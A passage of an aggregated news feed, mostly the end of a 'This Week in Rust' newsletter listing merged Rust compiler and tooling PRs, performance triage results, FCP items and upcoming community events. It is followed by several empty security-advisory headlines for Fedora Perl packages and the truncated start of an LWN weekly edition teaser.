<li><a href="https://github.com/rust-lang/rust/pull/159296">implement <code>bool::toggle</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159528">implement <code>const_binary_search</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159302">implement <code>Debug</code> helpers via <code>Cell</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156220">implement <code>VecDeque::truncate_to_range</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158061">make <code>pin!()</code> more foolproof</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158546">move <code>std::io::BufRead</code> to <code>alloc::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158544">move <code>std::io::Read</code> to <code>alloc::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158545">move <code>std::io::read_to_string</code> to <code>alloc::io</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159149">use PGO for Cargo</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17238"><code>timings</code>: only report units the job queue actually ran</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17236">do not include proc-macro deps in rustc search path args</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17216">include SBOM outputs in fingerprints</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17226">lazily initialize git2 fetch transports</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159194">fix auto trait normalization env</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159091">use PGO for rustdoc</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16855">add <code>block_scrutinee</code> lint</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17415">avoid invalid <code>ref_as_ptr</code> suggestions in const/static initializers</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16800">detect <code>== 0</code> on unsigned types as a <code>manual_clamp</code> lower bound</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17405">fix <code>if_not_else</code> linting on macro expanded conditions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17383">fix <code>needless_collect</code> suggests a suggestion that cannot be typed</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17385"><code>non_zero_suggestions</code>: don't lint signed integer div/rem as NonZero</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17377"><code>manual_filter</code>: don't eat comments in the <code>and_then</code> suggestion</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17369">require the use of <code>as _</code> for indirectly used traits in clippy sources</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17362">rewrite <code>min_ident_chars</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16633">use <code>#[must_use]</code> determination from the compiler</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22634">avoid index panic when flycheck list is empty</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22811">add capture hints to coroutines</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22813">add handler for E0572</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22483">do not assume array destructuring assignments with rest pattern are constant-sized</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22852">eagerly normalize <code>.await</code>'s <code>IntoFuture::Output</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22791">enable auto trait inference</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22792">extract variable preserving whitespace from macro input</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22832">fix coroutines not recording binding owners correctly</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22759">fix crashes in assists due to <code>.unwrap()</code> calls in SyntaxFactory</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22810">fix <code>hir</code> crate leaking bound variables from skipped binders</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22855">fix <code>InferenceContext:identity_args</code> using the wrong DefId</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22849">fix syntax bridge panic when spilting float</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22857">handle <code>enum</code> variants in next-solver <code>generics</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22818">implement lowering of HRTB</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22789">invalid <code>pattern_matching_variant</code> lowering due to recovery</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22867">merge <code>WherePredicate::ForLifetimes</code> into <code>WherePredicate::TypeBound</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22804">only write anon const ty in parent's inference result if it doesn't have its own inference</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22822">panic with a function item and a proc macro item having a duplicate name</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22827">parser to error on macro type bound</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22865">spawn proc-macro servers on requests clearing the client cache</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22782">use quote! inside <code>ast::make::expr_call()</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22793">use <code>Result</code> for the lsp-server <code>Response</code> payload type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22861">record expressions in types in <code>ExprScope</code></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>The two most notable changes this week were <a href="https://github.com/rust-lang/rust/pull/159115">#159115</a>,
which resulted in pretty nice instruction count wins for full incremental builds on several benchmarks,
and <a href="https://github.com/rust-lang/rust/pull/159091">#159091</a>, which enabled PGO for rustdoc, which
makes it ~3-4% faster across the board.</p>
<p>There were two large rollups with tiny performance regressions, which made it difficult to find
the offending PRs.</p>
<p>Triage done by <strong>@Kobzol</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=5503df87342a73d0c29126a7e08dc9c1255c46ad&amp;end=d527bc9bfa297ca7fd7f5ae93781eeec42073170&amp;absolute=false&amp;stat=instructions%3Au">5503df87..d527bc9b</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.4%</td>
<td>[0.2%, 1.0%]</td>
<td>40</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>0.7%</td>
<td>[0.2%, 4.6%]</td>
<td>69</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-2.0%</td>
<td>[-6.2%, -0.2%]</td>
<td>136</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-2.6%</td>
<td>[-8.4%, -0.2%]</td>
<td>119</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-1.4%</td>
<td>[-6.2%, 1.0%]</td>
<td>176</td>
</tr>
</tbody>
</table>
<p>2 Regressions, 3 Improvements, 6 Mixed; 4 of them in rollups
34 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/189822607d8d09acd85c234b2c245e817591ca67/triage/2026/2026-07-21.md">Full report here</a>.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/issues/159298">Tracking Issue for <code>bool::toggle</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/146954">Tracking Issue for vec_try_remove</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157562">Avoid computing layout of enums with non-int discriminants</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/71835">Tracking Issue for const_btree_len</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/138230">Add <code>raw_borrows_via_references</code> lint</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157572">stabilize size_of_val_raw, align_of_val_raw, Layout::for_value_raw</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158835">rustc_passes: lint unused <code>#[path]</code> attributes on inline modules</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1019">Emit <code>note</code> when calling <code>rustc</code> without specifying an edition</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1011">Let the OS handle stack growth</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1010">Add <code>target_feature_available_at_call_site</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#leadership-council"></a><a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>
<ul>
<li><a href="https://github.com/rust-lang/leadership-council/pull/314">Deallocate post-2026 funds from PM and compiler-ops</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#unsafe-code-guidelines"></a><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>
<ul>
<li><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues/558">Do the bytes of a pointer have to stay in the same order?</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
  <a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
  <a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>,
  <a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a> or
  <a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3984">RFC: Refactor the libs team</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-22 - 2026-08-19 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-24 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-31 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-01 | Virtual (Kampala, UG) | <a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587">Rust Circle Meetup</a><ul>
<li><a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587"><strong>Rust Circle Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-08-07 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/ii2jrwva"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-11 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254776/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/313345333/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/315619609/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-08-14 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/f2hnzrug"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315604176/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-08-19 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314105333/"><strong>Dealing with Dependencies</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#africa">Africa</a></h5>
<ul>
<li>2026-08-11 | Johannesburg, ZA | <a href="https://www.meetup.com/johannesburg-rust-meetup">Johannesburg Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/johannesburg-rust-meetup/events/315750593/"><strong>Rust's extended standard library</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-25 | Mumbai, IN | <a href="https://luma.com/mumbai">Rust Mumbai</a><ul>
<li><a href="https://luma.com/7ksabwbm/"><strong>​Rust Mumbai — July Meetup 🦀</strong></a></li>
</ul>
</li>
<li>2026-07-26 | Pune, IN | <a href="https://www.meetup.com/rust-pune">Rust Pune</a><ul>
<li><a href="https://www.meetup.com/rust-pune/events/315651505/"><strong>Rust Pune: July 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/rust-london-user-group">Rust London User Group</a><ul>
<li><a href="https://www.meetup.com/rust-london-user-group/events/315612916/"><strong>LDN Talks: July 2026 Antithesis Takeover</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a><ul>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Stockholm, SE | <a href="https://www.meetup.com/stockholm-rust">Stockholm Rust</a><ul>
<li><a href="https://www.meetup.com/stockholm-rust/events/315749994/"><strong>Ferris' Fika Forum #28</strong></a></li>
</ul>
</li>
<li>2026-07-27 | Augsburg, DE | <a href="https://rust-augsburg.github.io/meetup">Rust Meetup Augsburg</a><ul>
<li><a href="https://rust-augsburg.github.io/meetup/Meetup_20.html"><strong>Rust Meetup #20: Julian Dickert - Supply chain security in Rust: Evaluating crates for production</strong></a></li>
</ul>
</li>
<li>2026-07-29 | Poland, PL | <a href="https://www.meetup.com/rust-poland-meetup">Rust Poland</a><ul>
<li><a href="https://www.meetup.com/rust-poland-meetup/events/315582674/"><strong>Rust Poland x Kraków #10</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Copenhagen, DK | <a href="https://www.meetup.com/copenhagen-rust-community">Copenhagen Rust Community</a><ul>
<li><a href="https://www.meetup.com/copenhagen-rust-community/events/315767999/"><strong>Rust meetup #70</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Manchester, UK | <a href="https://www.meetup.com/rust-manchester">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Aarhus, DK | <a href="https://www.meetup.com/rust-aarhus">Rust Aarhus</a><ul>
<li><a href="https://www.meetup.com/rust-aarhus/events/315683629/"><strong>Hack Night: Trust but verify the LLM</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816474/"><strong>Topic TBD</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
<li>2026-07-22 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc/events/">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315636854/"><strong>Rust NYC: Write A Custom Coding Agent and wasm_zero</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/315418155/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
</li>
<li>2026-08-06 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/314701905/"><strong>Shipping Temporal: How a Global Rust Ecosystem Built Chrome’s Newest Web API</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696652/"><strong>Utah Rust August Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-13 | San Diego, CA, US | <a href="https://www.meetup.com/san-diego-rust">San Diego Rust</a><ul>
<li><a href="https://www.meetup.com/san-diego-rust/events/315601099/"><strong>San Diego Rust August Meetup - Back in person!</strong></a></li>
</ul>
</li>
<li>2026-08-15 | San Francisco, CA, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/juWAwRs3XMWP7s9wLNWK"><strong>BOG-A-THON 3</strong></a></li>
</ul>
</li>
<li>2026-08-18 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997215/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-08-19 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314105333/"><strong>Dealing with Dependencies</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a><ul>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#south-america">South America</a></h5>
<ul>
<li>2026-08-08 | São Paulo, SP | <a href="https://luma.com/calendar/cal-bif2oHITU1aVvsr">Rust-SP</a><ul>
<li><a href="https://luma.com/41oiyhtk"><strong>Rust SP - Aug/2026</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>We were planning on publishing a blog post announcing this at the same time as making the repo public, but ran out of private repo CI usage 😭.</p>
</blockquote>
<p>– <a href="https://www.reddit.com/r/rust/comments/1uzknzl/tokiorstopcoat_a_batteriesincluded_framework_for/oy8k2nn/">Carl Lerche on r/rust</a> about the launch of topcoat</p>
<p>Despite a lamentable lack of suggestions, llogiq is glad to have found this quote.</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1v41dgv/this_week_in_rust_661/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in perl-YAML-Syck (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3688004/unix-server/security-mehrere-probleme-in-perl-yaml-syck-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688004/unix-server/security-mehrere-probleme-in-perl-yaml-syck-fedora/</guid>
<pubDate>Thu, 23 Jul 2026 06:48:33 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in perl-DBI (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3688001/unix-server/security-mehrere-probleme-in-perl-dbi-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688001/unix-server/security-mehrere-probleme-in-perl-dbi-fedora/</guid>
<pubDate>Thu, 23 Jul 2026 06:48:18 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in perl-DBI (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3688000/unix-server/security-mehrere-probleme-in-perl-dbi-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688000/unix-server/security-mehrere-probleme-in-perl-dbi-fedora/</guid>
<pubDate>Thu, 23 Jul 2026 06:48:16 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in perl-YAML-Syck (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3687998/unix-server/security-mehrere-probleme-in-perl-yaml-syck-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687998/unix-server/security-mehrere-probleme-in-perl-yaml-syck-fedora/</guid>
<pubDate>Thu, 23 Jul 2026 06:48:06 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] LWN.net Weekly Edition for July 23, 2026]]></title>
<description><![CDATA[Inside this week's LWN.net Weekly Edition:
        
        
 Front: LLMs in the kernel; GNOME save and restore; Fedora changes; BPF and tracepoints; BPF and LSMs; famfs; sched_ext.
             Briefs: GNOME security; PyPI policy; Arch on aarch64; Firefox 153; Quotes; ...
             Announceme...]]></description>
